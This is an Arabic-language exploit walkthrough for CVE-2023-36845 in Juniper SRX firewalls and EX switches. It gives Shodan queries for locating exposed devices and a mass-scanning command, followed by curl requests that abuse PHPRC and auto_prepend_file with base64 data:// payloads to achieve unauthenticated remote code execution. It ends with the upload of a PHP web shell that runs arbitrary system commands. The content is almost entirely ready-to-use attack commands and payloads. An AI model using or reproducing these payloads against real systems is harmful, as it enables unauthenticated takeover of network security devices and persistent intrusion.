
جدران الحماية Juniper CVE-2023-36845 - RCE
يمثل CVE-2023-36845 ثغرة بارزة في التلاعب بمتغيرات بيئة PHP تؤثر على جدران حماية Juniper SRX ومفاتيح EX. على الرغم من أن Juniper صنفت هذه الثغرة على أنها متوسطة الخطورة، إلا أننا في هذا المقال سنوضح كيف يمكن استغلال هذه الثغرة الواحدة لتنفيذ تعليمات برمجية عن بُعد دون مصادقة.
title:"Juniper Web Device Manager"
title:"Juniper" http.favicon.hash:2141724739
الكشف
python3 CVE-2023-36845.py -f targets.txt -o output.txt
من الممكن استخدام أي غلاف بروتوكول مع auto_prepend_file. الخيار الأنسب لهذه العملية هو بروتوكول data://، الذي يسمح بتوفير "الملف الثانوي" مباشرة. فيما يلي تمثيل متطور لهذا الاستغلال، الذي ينفذ <? phpinfo(); ?> المضمنة داخل مخطط data://:
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
تنفيذ أمر whoami
<?php shell_exec('whoami'); ?>
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
رفع ملف
<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=
", "csize": 110}]'
| المعلمة | الوصف | النوع |
|---|---|---|
| --file / -f | ملف الأهداف المدخلة | ملف |
| -o | ملف الإخراج | ملف |